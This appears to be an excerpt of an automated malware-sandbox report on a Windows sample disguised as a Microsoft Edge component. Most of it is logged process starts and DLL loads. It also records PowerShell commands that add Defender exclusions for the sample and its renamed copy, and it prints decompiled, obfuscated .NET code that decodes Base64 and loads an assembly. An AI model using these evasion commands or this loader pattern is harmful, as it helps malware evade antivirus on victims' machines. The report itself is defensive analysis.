Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown, Process created: C:\Users\user\AppData\Roaming\msedge.exe "C:\Users\user\AppData\Roaming\msedge.exe"
Source: unknown, Process created: C:\Users\user\AppData\Roaming\msedge.exe "C:\Users\user\AppData\Roaming\msedge.exe"
Source: C:\Users\user\Desktop\msedge_visual_render.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge_visual_render.exe'
Source: C:\Users\user\Desktop\msedge_visual_render.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge_visual_render.exe'
Source: C:\Users\user\Desktop\msedge_visual_render.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\msedge.exe'
Source: C:\Users\user\Desktop\msedge_visual_render.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
Source: C:\Users\user\Desktop\msedge_visual_render.exe, Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\msedge_visual_render.exe, Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\msedge_visual_render.exe, Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\msedge_visual_render.exe, Section loaded: version.dll
Source: C:\Users\user\Desktop\msedge_visual_render.exe, Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\msedge_visual_render.exe, Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\msedge_visual_render.exe, Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\msedge_visual_render.exe, Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\msedge_visual_render.exe, Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\msedge_visual_render.exe, Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\msedge_visual_render.exe, Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\msedge_visual_render.exe, Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\msedge_visual_render.exe, Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\msedge_visual_render.exe, Section loaded: wldp.dll
Source: C:\Users\user\Desktop\msedge_visual_render.exe, Section loaded: propsys.dll
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Users\user\Desktop\msedge_visual_render.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\msedge.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\msedge_visual_render.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
              Source: msedge.lnk.0.drLNK file: ..\..\..\..\..\msedge.exe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: msedge_visual_render.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: msedge_visual_render.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

              Source: msedge_visual_render.exe, gdw2cqoX4TszY141RCuGz0juBedMNvOtAMnO7KvHhK7yEC6KroNireLJQgUwUKUiQOOee8BzIcunbCmM57IW0R13.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{bxcBt78aiQPZysmduURelBepFbgdibN2oiPiDXwCYdBEDmxwhyJgiBT._4KoARYDOQ9VLM9kYHmUXl0TIJBVcAWwhHQdPzVFF1TirE6JwTOjUgxh,bxcBt78aiQPZysmduURelBepFbgdibN2oiPiDXwCYdBEDmxwhyJgiBT.XwxR3w92hYWm3OtktjYAuUUzmFlAiK5p8XJH8o6Jkmx1Y7nQbUBOXEn,bxcBt78aiQPZysmduURelBepFbgdibN2oiPiDXwCYdBEDmxwhyJgiBT.AvVErL5jnNbxMgQcKtQFsqwhSA73cplEUkr4Blkx5g6tLn7fLySkDYO,bxcBt78aiQPZysmduURelBepFbgdibN2oiPiDXwCYdBEDmxwhyJgiBT.IpSuxM8rkOLKDWfFCbXiilUMMAq9XhLI84dFOAZdBteOceY3PqmXAEu,_2c2OZMa7wIHjbQyGjzc9vbqhoSyzYYwSaHycpYduXsi9Kun78wGkFvt1I9Kue9An4GYq2jn0n.Q5p04PRAB7LBBAAaZF0O16kjvtWGEN0Dw2pSJhBMl2N3H8t27ao4xHjSwF8wWyGjYu5BjToEY()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: msedge_visual_render.exe, gdw2cqoX4TszY141RCuGz0juBedMNvOtAMnO7KvHhK7yEC6KroNireLJQgUwUKUiQOOee8BzIcunbCmM57IW0R13.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{S4ku4qClcCh2gh5Z8HTpbNWpRNq6v1srJBGTHgeJWNc1isDDrHke96faparjohKizoBNseHTw1Zl83cEllRjMGL5[2],_2c2OZMa7wIHjbQyGjzc9vbqhoSyzYYwSaHycpYduXsi9Kun78wGkFvt1I9Kue9An4GYq2jn0n.eRcJhU85fgETQetokKo0O7H8LsfE25GNLLREJszbxkDRDwyfsy1Bwoqp5kMGguoIGTTFDPQTv(Convert.FromBase64String(S4ku4qClcCh2gh5Z8HTpbNWpRNq6v1srJBGTHgeJWNc1isDDrHke96faparjohKizoBNseHTw1Zl83cEllRjMGL5[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: msedge.exe.0.dr, gdw2cqoX4TszY141RCuGz0juBedMNvOtAMnO7KvHhK7yEC6KroNireLJQgUwUKUiQOOee8BzIcunbCmM57IW0R13.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{bxcBt78aiQPZysmduURelBepFbgdibN2oiPiDXwCYdBEDmxwhyJgiBT._4KoARYDOQ9VLM9kYHmUXl0TIJBVcAWwhHQdPzVFF1TirE6JwTOjUgxh,bxcBt78aiQPZysmduURelBepFbgdibN2oiPiDXwCYdBEDmxwhyJgiBT.XwxR3w92hYWm3OtktjYAuUUzmFlAiK5p8XJH8o6Jkmx1Y7nQbUBOXEn,bxcBt78aiQPZysmduURelBepFbgdibN2oiPiDXwCYdBEDmxwhyJgiBT.AvVErL5jnNbxMgQcKtQFsqwhSA73cplEUkr4Blkx5g6tLn7fLySkDYO,bxcBt78aiQPZysmduURelBepFbgdibN2oiPiDXwCYdBEDmxwhyJgiBT.IpSuxM8rkOLKDWfFCbXiilUMMAq9XhLI84dFOAZdBteOceY3PqmXAEu,_2c2OZMa7wIHjbQyGjzc9vbqhoSyzYYwSaHycpYduXsi9Kun78wGkFvt1I9Kue9An4GYq2jn0n.Q5p04PRAB7LBBAAaZF0O16kjvtWGEN0Dw2pSJhBMl2N3H8t27ao4xHjSwF8wWyGjYu5BjToEY()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: msedge.exe.0.dr, gdw2cqoX4TszY141RCuGz0juBedMNvOtAMnO7KvHhK7yEC6KroNireLJQgUwUKUiQOOee8BzIcunbCmM57IW0R13.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{S4ku4qClcCh2gh5Z8HTpbNWpRNq6v1srJBGTHgeJWNc1isDDrHke96faparjohKizoBNseHTw1Zl83cEllRjMGL5[2],_2c2OZMa7wIHjbQyGjzc9vbqhoSyzYYwSaHycpYduXsi9Kun78wGkFvt1I9Kue9An4GYq2jn0n.eRcJhU85fgETQetokKo0O7H8LsfE25GNLLREJszbxkDRDwyfsy1Bwoqp5kMGguoIGTTFDPQTv(Convert.FromBase64String(S4ku4qClcCh2gh5Z8HTpbNWpRNq6v1srJBGTHgeJWNc1isDDrHke96faparjohKizoBNseHTw1Zl83cEllRjMGL5[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: msedge_visual_render.exe, gdw2cqoX4TszY141RCuGz0juBedMNvOtAMnO7KvHhK7yEC6KroNireLJQgUwUKUiQOOee8BzIcunbCmM57IW0R13.cs.Net Code: cQRHu4A1JGPAbtFj4cchJe7gNguKVqA95hp4xT5TrPCVY72UKZMiZdpHpESCNruTjpmuxNlG7MQHkSRKLTRMIpVg System.AppDomain.Load(byte[])
